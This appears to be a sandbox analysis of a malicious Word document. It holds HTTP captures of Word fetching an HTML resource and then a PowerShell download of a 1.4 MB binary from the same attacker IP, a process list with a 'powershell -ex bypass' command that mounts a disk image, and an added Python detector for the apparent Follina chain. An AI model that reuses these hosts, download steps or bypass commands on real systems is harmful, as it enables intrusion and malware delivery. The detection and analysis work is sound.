                                                                                                                                                                    Jun 7, 2022 19:22:39.245332003 CEST8049780185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:22:39.245347977 CEST4978080192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:22:39.245369911 CEST8049780185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:22:39.245400906 CEST8049780185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:22:39.245414972 CEST4978080192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:22:39.245440960 CEST8049780185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:22:39.245471001 CEST8049780185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:22:39.245484114 CEST4978080192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:22:39.245510101 CEST8049780185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:22:39.245541096 CEST8049780185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:22:39.245553017 CEST4978080192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:22:39.245579958 CEST8049780185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:22:39.245610952 CEST8049780185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:22:39.245623112 CEST4978080192.168.2.4185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:22:39.245646954 CEST8049780185.234.247.119192.168.2.4
                                                                                                                                                                    Jun 7, 2022 19:22:39.245692015 CEST4978080192.168.2.4185.234.247.119
                                                                                                                                                                    • 185.234.247.119
                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                    0192.168.2.449761185.234.247.11980C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                    Jun 7, 2022 19:21:14.123152971 CEST1219OUTOPTIONS / HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Authorization: Bearer
                                                                                                                                                                    User-Agent: Microsoft Office Word 2014
                                                                                                                                                                    X-Office-Major-Version: 16
                                                                                                                                                                    X-MS-CookieUri-Requested: t
                                                                                                                                                                    X-FeatureVersion: 1
                                                                                                                                                                    X-MSGETWEBURL: t
                                                                                                                                                                    X-IDCRL_ACCEPTED: t
                                                                                                                                                                    Host: 185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:21:14.150614023 CEST1220INHTTP/1.1 405 Not Allowed
                                                                                                                                                                    Server: nginx
                                                                                                                                                                    Date: Tue, 07 Jun 2022 17:21:14 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 150
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                    Jun 7, 2022 19:21:14.453907967 CEST1220OUTHEAD /123.RES HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Authorization: Bearer
                                                                                                                                                                    User-Agent: Microsoft Office Word 2014
                                                                                                                                                                    X-Office-Major-Version: 16
                                                                                                                                                                    X-MS-CookieUri-Requested: t
                                                                                                                                                                    X-FeatureVersion: 1
                                                                                                                                                                    X-IDCRL_ACCEPTED: t
                                                                                                                                                                    Host: 185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:21:14.481559992 CEST1220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx
                                                                                                                                                                    Date: Tue, 07 Jun 2022 17:21:14 GMT
                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                    Content-Length: 6241
                                                                                                                                                                    Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    ETag: "6299dd5d-1861"
                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                    Jun 7, 2022 19:21:17.600215912 CEST1222OUTOPTIONS / HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Authorization: Bearer
                                                                                                                                                                    User-Agent: Microsoft Office Word 2014
                                                                                                                                                                    X-Office-Major-Version: 16
                                                                                                                                                                    X-MS-CookieUri-Requested: t
                                                                                                                                                                    X-FeatureVersion: 1
                                                                                                                                                                    X-MSGETWEBURL: t
                                                                                                                                                                    X-IDCRL_ACCEPTED: t
                                                                                                                                                                    Host: 185.234.247.119
                                                                                                                                                                    Jun 7, 2022 19:21:17.628205061 CEST1222INHTTP/1.1 405 Not Allowed
                                                                                                                                                                    Server: nginx
                                                                                                                                                                    Date: Tue, 07 Jun 2022 17:21:17 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 150
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                    Jun 7, 2022 19:21:18.721376896 CEST1231OUTOPTIONS / HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Authorization: Bearer
                                                                                                                                                                    User-Agent: Microsoft Office Word 2014
X-Office-Major-Version: 16
X-MS-CookieUri-Requested: t
X-FeatureVersion: 1
X-MSGETWEBURL: t
X-IDCRL_ACCEPTED: t
Host: 185.234.247.119
Jun 7, 2022 19:21:18.748950005 CEST | 1231 | IN | HTTP/1.1 405 Not Allowed
Server: nginx
Date: Tue, 07 Jun 2022 17:21:18 GMT
Content-Type: text/html
Content-Length: 150
Connection: keep-alive
                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>
Jun 7, 2022 19:21:18.837891102 CEST | 1231 | OUT | HEAD /123.RES HTTP/1.1
Connection: Keep-Alive
Authorization: Bearer
User-Agent: Microsoft Office Word 2014
X-Office-Major-Version: 16
X-MS-CookieUri-Requested: t
X-FeatureVersion: 1
X-IDCRL_ACCEPTED: t
Host: 185.234.247.119
Jun 7, 2022 19:21:18.865309000 CEST | 1232 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 07 Jun 2022 17:21:18 GMT
Content-Type: application/octet-stream
Content-Length: 6241
Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
Connection: keep-alive
ETag: "6299dd5d-1861"
Accept-Ranges: bytes


Session ID: 1
Source IP: 192.168.2.4   Source Port: 49762
Destination IP: 185.234.247.119   Destination Port: 80
Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Timestamp | kBytes transferred | Direction | Data
Jun 7, 2022 19:21:17.757827997 CEST | 1222 | OUT | GET /123.RES HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
Accept-Encoding: gzip, deflate
Host: 185.234.247.119
Connection: Keep-Alive
Jun 7, 2022 19:21:17.785537958 CEST | 1224 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 07 Jun 2022 17:21:17 GMT
Content-Type: application/octet-stream
Content-Length: 6241
Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
Connection: keep-alive
ETag: "6299dd5d-1861"
Accept-Ranges: bytes
                                                                                                                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 0d 0a 47 6f 6f 64 20 74 68 69 6e 67 20 77 65 20 64 69 73 61 62 6c 65 64 20 6d 61 63 72 6f 73 0d 0a 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 70 3e 0d 0a 4c 6f 72 65 6d 20 69 70 73 75 6d 20 64 6f 6c 6f 72 20 73 69 74 20 61 6d 65 74 2c 20 63 6f 6e 73 65 63 74 65 74 75 72 20 61 64 69 70 69 73 63 69 6e 67 20 65 6c 69 74 2e 20 51 75 69 73 71 75 65 20 70 65 6c 6c 65 6e 74 65 73 71 75 65 20 65 67 65 73 74 61 73 20 6e 75 6c 6c 61 20 69 6e 20 64 69 67 6e 69 73 73 69 6d 2e 20 4e 61 6d 20 69 64 20 6d 61 75 72 69 73 20 6c 6f 72 65 6d 2e 20 4e 75 6e 63 20 73 75 73 63 69 70 69 74 20 69 64 20 6d 61 67 6e 61 20 69 64 20 6d 6f 6c 6c 69 73 2e 20 50 65 6c 6c 65 6e 74 65 73 71 75 65 20 73 75 73 63 69 70 69 74 20 6f 72 63 69 20 6e 65 71 75 65 2c 20 61 74 20 6f 72 6e 61 72 65 20 73 61 70 69 65 6e 20 62 69 62 65 6e 64 75 6d 20 65 75 2e 20 56 65 73 74 69 62 75 6c 75 6d 20 6d 61 6c 65 73 75 61 64 61 20 6e 65 63 20 73 65 6d 20 71 75 69 73 20 66 69 6e 69 62 75 73 2e 20 4e 61 6d 20 71 75 69 73 20 6c 69 67 75 6c 61 20 65 74 20 64 75 69 20 66 61 75 63 69 62 75 73 20 66 61 75 63 69 62 75 73 2e 20 49 6e 20 71 75 69 73 20 62 69 62 65 6e 64 75 6d 20 74 6f 72 74 6f 72 2e 0d 0a 0d 0a 43 75 72 61 62 69 74 75 72 20 72 75 74 72 75 6d 20 6c 65 6f 20 74 6f 72 74 6f 72 2c 20 76 65 6e 65 6e 61 74 69 73 20 66 65 72 6d 65 6e 74 75 6d 20 65 78 20 70 6f 72 74 74 69 74 6f 72 20 76 69 74 61 65 2e 20 50 72 6f 69 6e 20 65 75 20 69 6d 70 65 72 64 69 65 74 20 6c 6f 72 65 6d 2c 20 61 63 20 61 6c 69 71 75 65 74 20 72 69 73 75 73 2e 20 41 65 6e 65 61 6e 20 65 75 20 73 61 70 69 65 6e 20 70 68 61 72 65 74 72 61 2c 20 69 6d 70 65 72 64 69 65 74 20 69 70 73 75 6d 
20 75 74 2c 20 73 65 6d 70 65 72 20 64 69 61 6d 2e 20 4e 75 6c 6c 61 20 66 61 63 69 6c 69 73 69 2e 20 53 65 64 20 65 75 69 73 6d 6f 64 20 74 6f 72 74 6f 72 20 74 6f 72 74 6f 72 2c 20 6e 6f 6e 20 65 6c 65 69 66 65 6e 64 20 6e 75 6e 63 20 66 65 72 6d 65 6e 74 75 6d 20 73 69 74 20 61 6d 65 74 2e 20 49 6e 74 65 67 65 72 20 6c 69 67 75 6c 61 20 6c 69 67 75 6c 61 2c 20 63 6f 6e 67 75 65 20 61 74 20 73 63 65 6c 65 72 69 73 71 75 65 20 73 69 74 20 61 6d 65 74 2c 20 70 6f 72 74 74 69 74 6f 72 20 71 75 69 73 20 66 65 6c 69 73 2e 20 4d 61 65 63 65 6e 61 73 20 6e 65 63 20 6a 75 73 74 6f 20 76 61 72 69 75 73 2c 20 73 65 6d 70 65 72 20 74 75 72 70 69 73 20 75 74 2c 20 67 72 61 76 69 64 61 20 6c 6f 72 65 6d 2e 20 50 72 6f 69 6e 20 61 72 63 75 20 6c 69 67 75 6c 61 2c 20 76 65 6e 65 6e 61 74 69 73 20 61 6c 69 71 75 61 6d 20 74 72 69 73 74 69 71 75 65 20 75 74 2c 20 70 72 65 74 69 75 6d 20 71 75 69 73 20 76 65 6c 69 74 2e 0d 0a 0d 0a 50 68 61 73 65 6c 6c 75 73 20 74 72 69 73 74 69 71 75 65 20 6f 72 63 69 20 65 6e 69 6d 2c 20 61 74 20 61 63 63 75 6d 73 61 6e 20 76 65 6c 69 74 20 69 6e 74 65 72 64 75 6d 20 65 74 2e 20 41 65 6e 65 61 6e 20 6e 65 63 20 74 72 69 73 74 69 71 75 65 20 61 6e 74 65 2c 20 64 69 67 6e 69 73 73 69 6d 20 63 6f 6e 76 61 6c 6c 69 73 20 6c 69 67 75 6c 61 2e 20 41 65 6e 65 61 6e 20 71 75 69 73 20 66 65 6c 69 73 20 64 6f 6c 6f 72 2e 20 49 6e 20 71 75 69 73 20 6c 65 63 74 75 73 20 6d 61 73 73 61 2e 20 50 65 6c 6c 65 6e 74 65
                                                                                                                                                                    Data Ascii: <!doctype html><html lang="en"><head><title>Good thing we disabled macros</title></head><body><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique ante, dignissim convallis ligula. Aenean quis felis dolor. In quis lectus massa. Pellente
Jun 7, 2022 19:21:18.104799032 CEST | 1230 | OUT | HEAD /123.RES HTTP/1.1
Authorization: Bearer
X-MS-CookieUri-Requested: t
X-IDCRL_ACCEPTED: t
User-Agent: Microsoft Office Existence Discovery
Host: 185.234.247.119
Connection: Keep-Alive
Jun 7, 2022 19:21:18.132652044 CEST | 1230 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 07 Jun 2022 17:21:18 GMT
Content-Type: application/octet-stream
Content-Length: 6241
Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
Connection: keep-alive
ETag: "6299dd5d-1861"
Accept-Ranges: bytes
Jun 7, 2022 19:21:18.607587099 CEST | 1230 | OUT | HEAD /123.RES HTTP/1.1
Authorization: Bearer
X-MS-CookieUri-Requested: t
X-IDCRL_ACCEPTED: t
User-Agent: Microsoft Office Existence Discovery
Host: 185.234.247.119
Connection: Keep-Alive
Jun 7, 2022 19:21:18.635207891 CEST | 1230 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 07 Jun 2022 17:21:18 GMT
Content-Type: application/octet-stream
Content-Length: 6241
Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
Connection: keep-alive
ETag: "6299dd5d-1861"
Accept-Ranges: bytes
Jun 7, 2022 19:21:18.925173044 CEST | 1232 | OUT | GET /123.RES HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
Accept-Encoding: gzip, deflate
Host: 185.234.247.119
If-Modified-Since: Fri, 03 Jun 2022 10:07:25 GMT
If-None-Match: "6299dd5d-1861"
Connection: Keep-Alive
Jun 7, 2022 19:21:18.952740908 CEST | 1232 | IN | HTTP/1.1 304 Not Modified
Server: nginx
Date: Tue, 07 Jun 2022 17:21:18 GMT
Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
Connection: keep-alive
ETag: "6299dd5d-1861"
Jun 7, 2022 19:21:18.963536978 CEST | 1233 | OUT | HEAD /123.RES HTTP/1.1
Authorization: Bearer
X-MS-CookieUri-Requested: t
X-IDCRL_ACCEPTED: t
User-Agent: Microsoft Office Existence Discovery
Host: 185.234.247.119
Connection: Keep-Alive
Jun 7, 2022 19:21:18.991211891 CEST | 1233 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 07 Jun 2022 17:21:18 GMT
Content-Type: application/octet-stream
Content-Length: 6241
Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
Connection: keep-alive
ETag: "6299dd5d-1861"
Accept-Ranges: bytes
Jun 7, 2022 19:21:19.215001106 CEST | 1234 | OUT | HEAD /123.RES HTTP/1.1
Authorization: Bearer
X-MS-CookieUri-Requested: t
X-IDCRL_ACCEPTED: t
User-Agent: Microsoft Office Existence Discovery
Host: 185.234.247.119
Connection: Keep-Alive
Jun 7, 2022 19:21:19.242710114 CEST | 1234 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 07 Jun 2022 17:21:19 GMT
Content-Type: application/octet-stream
Content-Length: 6241
Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
Connection: keep-alive
ETag: "6299dd5d-1861"
Accept-Ranges: bytes
Jun 7, 2022 19:21:28.708358049 CEST | 1315 | OUT | HEAD /123.RES HTTP/1.1
Authorization: Bearer
X-MS-CookieUri-Requested: t
X-IDCRL_ACCEPTED: t
User-Agent: Microsoft Office Existence Discovery
Host: 185.234.247.119
Connection: Keep-Alive
Jun 7, 2022 19:21:28.736881971 CEST | 1315 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 07 Jun 2022 17:21:28 GMT
Content-Type: application/octet-stream
Content-Length: 6241
Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
Connection: keep-alive
ETag: "6299dd5d-1861"
Accept-Ranges: bytes
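
What these two streams show: the Word process GETs /123.RES and receives an HTML page titled "Good thing we disabled macros" served as application/octet-stream, then repeatedly HEADs the same path with the User-Agent "Microsoft Office Existence Discovery" and re-GETs it with If-None-Match (304 Not Modified). About 81 seconds later, in session 2, a request carrying a WindowsPowerShell/5.1 User-Agent pulls a 1,437,696-byte application/octet-stream, /1240405476.dat, from the same host. The sandbox attributes that second session to WINWORD.EXE as well, so a detector has to key on the user agent rather than on the process image. An Office process pulling a remote HTML resource, followed within minutes by a PowerShell download from the same host, is the shape of a Follina (CVE-2022-30190) chain. The script below is an added example, not part of the sandbox report or of the analysed sample: it correlates the two stages over constructed records modelled on sessions 1 and 2 plus one unrelated download that must not fire. The record layout, the 100 kB payload threshold and the five-minute correlation window are assumptions.

```python
"""Added example (not part of the sandbox report): correlate an Office process
fetching a remote resource with a later PowerShell download from the same host.
Records are constructed here and modelled on the sessions above; the field layout
is an assumption, not the sandbox's export format."""
from __future__ import annotations

from dataclasses import dataclass
from datetime import datetime, timedelta

OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe"}
# User agent Office sends on the HEAD probes it issues for a linked resource.
EXISTENCE_PROBE_UA = "Microsoft Office Existence Discovery"
MIN_PAYLOAD_BYTES = 100_000              # assumption: "large binary" threshold
FOLLOW_ON_WINDOW = timedelta(minutes=5)  # assumption: correlation window


@dataclass
class HttpEvent:
    ts: datetime
    process: str            # image path the sandbox attributed the session to
    dst_ip: str
    method: str
    path: str
    user_agent: str
    status: int
    content_type: str = ""
    content_length: int = 0
    body_prefix: str = ""   # start of the response body, if the capture has it


def _is_office(ev: HttpEvent) -> bool:
    return ev.process.rsplit("\\", 1)[-1].lower() in OFFICE_IMAGES


def office_remote_fetches(events: list[HttpEvent]) -> list[HttpEvent]:
    """Office probing a linked resource, or pulling one that comes back as HTML:
    the external-reference fetch that opens a Follina-style chain."""
    hits = []
    for ev in events:
        if not _is_office(ev):
            continue
        probe = ev.method == "HEAD" and ev.user_agent == EXISTENCE_PROBE_UA
        html = ev.method == "GET" and ev.body_prefix.lstrip().lower().startswith(
            ("<!doctype html", "<html"))
        if probe or html:
            hits.append(ev)
    return hits


def powershell_downloads(events: list[HttpEvent]) -> list[HttpEvent]:
    """Keyed on the user agent, not the process image: the sandbox attributes the
    PowerShell session above to WINWORD.EXE."""
    return [ev for ev in events
            if "WindowsPowerShell/" in ev.user_agent
            and ev.status == 200
            and ev.content_type == "application/octet-stream"
            and ev.content_length >= MIN_PAYLOAD_BYTES]


def correlate(events: list[HttpEvent]) -> list[dict]:
    """Pair each qualifying download with the earliest Office fetch from the same
    host inside FOLLOW_ON_WINDOW; one finding per download."""
    fetches = office_remote_fetches(events)
    findings = []
    for dl in powershell_downloads(events):
        related = [f for f in fetches
                   if f.dst_ip == dl.dst_ip and f.ts <= dl.ts <= f.ts + FOLLOW_ON_WINDOW]
        if related:
            first = min(related, key=lambda f: f.ts)
            findings.append({
                "host": dl.dst_ip,
                "office_process": first.process,
                "office_resource": first.path,
                "payload": dl.path,
                "payload_bytes": dl.content_length,
                "seconds_between": round((dl.ts - first.ts).total_seconds(), 3),
            })
    return findings


WORD = r"C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE"
OFFICE_UA = ("Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; "
             ".NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; "
             ".NET CLR 3.5.30729; ms-office; MSOffice 16)")
PS_UA = "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1"


def sample_events() -> list[HttpEvent]:
    """Constructed records modelled on sessions 1 and 2, plus one unrelated
    download (made-up host and path) that must not produce a finding."""
    host = "185.234.247.119"
    return [
        HttpEvent(datetime(2022, 6, 7, 19, 21, 17, 757828), WORD, host, "GET", "/123.RES",
                  OFFICE_UA, 200, "application/octet-stream", 6241, "<!doctype html>"),
        HttpEvent(datetime(2022, 6, 7, 19, 21, 18, 104799), WORD, host, "HEAD", "/123.RES",
                  EXISTENCE_PROBE_UA, 200, "application/octet-stream", 6241),
        HttpEvent(datetime(2022, 6, 7, 19, 21, 18, 925173), WORD, host, "GET", "/123.RES",
                  OFFICE_UA, 304),
        HttpEvent(datetime(2022, 6, 7, 19, 22, 39, 49491), WORD, host, "GET", "/1240405476.dat",
                  PS_UA, 200, "application/octet-stream", 1437696),
        # unrelated control: PowerShell download with no preceding Office fetch from that host
        HttpEvent(datetime(2022, 6, 7, 19, 23, 0), r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                  "203.0.113.10", "GET", "/update.bin", PS_UA, 200, "application/octet-stream", 2_000_000),
    ]


if __name__ == "__main__":
    for finding in correlate(sample_events()):
        print(finding)
```

Run against the constructed records it yields one finding, linking /123.RES to /1240405476.dat on 185.234.247.119 roughly 81 seconds apart, and nothing for the control download. In production the same logic would read proxy or EDR network telemetry; the HTML check on the body prefix is what separates a remote template fetch from a legitimate Office document link, since the page came back as application/octet-stream and the content type alone says nothing.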


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.4 | 49780 | 185.234.247.119 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Timestamp | kBytes transferred | Direction | Data
Jun 7, 2022 19:22:39.049490929 CEST | 4415 | OUT | GET /1240405476.dat HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
Host: 185.234.247.119
Connection: Keep-Alive
Jun 7, 2022 19:22:39.216723919 CEST | 4416 | IN | HTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx
                                                                                                                                                                    Date: Tue, 07 Jun 2022 17:22:39 GMT
                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                    Content-Length: 1437696
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                    Expires: 0
                                                                                                                                                                    Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                    Content-Disposition: attachment;



                                                                                                                                                                    Target ID:0
                                                                                                                                                                    Start time:19:20:46
                                                                                                                                                                    Start date:07/06/2022
                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c powershell.exe -ex bypass -command Mount-DiskImage -ImagePath "C:\Users\user\Desktop\68101181_048154.img"
                                                                                                                                                                    Imagebase:0x1190000
                                                                                                                                                                    File size:232960 bytes
                                                                                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high

                                                                                                                                                                    Target ID:1
                                                                                                                                                                    Start time:19:20:47
                                                                                                                                                                    Start date:07/06/2022
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff647620000
                                                                                                                                                                    File size:625664 bytes
                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high

                                                                                                                                                                    Target ID:2
                                                                                                                                                                    Start time:19:20:48
                                                                                                                                                                    Start date:07/06/2022
                                                                                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:powershell.exe -ex bypass -command Mount-DiskImage -ImagePath "C:\Users\user\Desktop\68101181_048154.img"
                                                                                                                                                                    Imagebase:0xea0000
                                                                                                                                                                    File size:430592 bytes
                                                                                                                                                                    MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                                    Reputation:high

                                                                                                                                                                    Target ID:7
                                                                                                                                                                    Start time:19:20:59
                                                                                                                                                                    Start date:07/06/2022
                                                                                                                                                                    Path:C:\Windows\System32\drivers\udfs.sys
                                                                                                                                                                    Wow64 process (32bit):
                                                                                                                                                                    Commandline:
                                                                                                                                                                    Imagebase:
                                                                                                                                                                    File size:324608 bytes
                                                                                                                                                                    MD5 hash:6A442723D4D05D9F15D24C9942CDA00D
                                                                                                                                                                    Has elevated privileges:
                                                                                                                                                                    Has administrator privileges:
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:moderate

                                                                                                                                                                    Target ID:9
                                                                                                                                                                    Start time:19:21:01
                                                                                                                                                                    Start date:07/06/2022
                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /n "E:\doc276.docx" /o "
                                                                                                                                                                    Imagebase:0x1280000
                                                                                                                                                                    File size:1937688 bytes
                                                                                                                                                                    MD5 hash:0B9AB9B9C4DE429473D6450D4297A123
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high

                                                                                                                                                                    Target ID:11
                                                                                                                                                                    Start time:19:21:12
                                                                                                                                                                    Start date:07/06/2022
                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
                                                                                                                                                                    Wow64 process (32bit):true
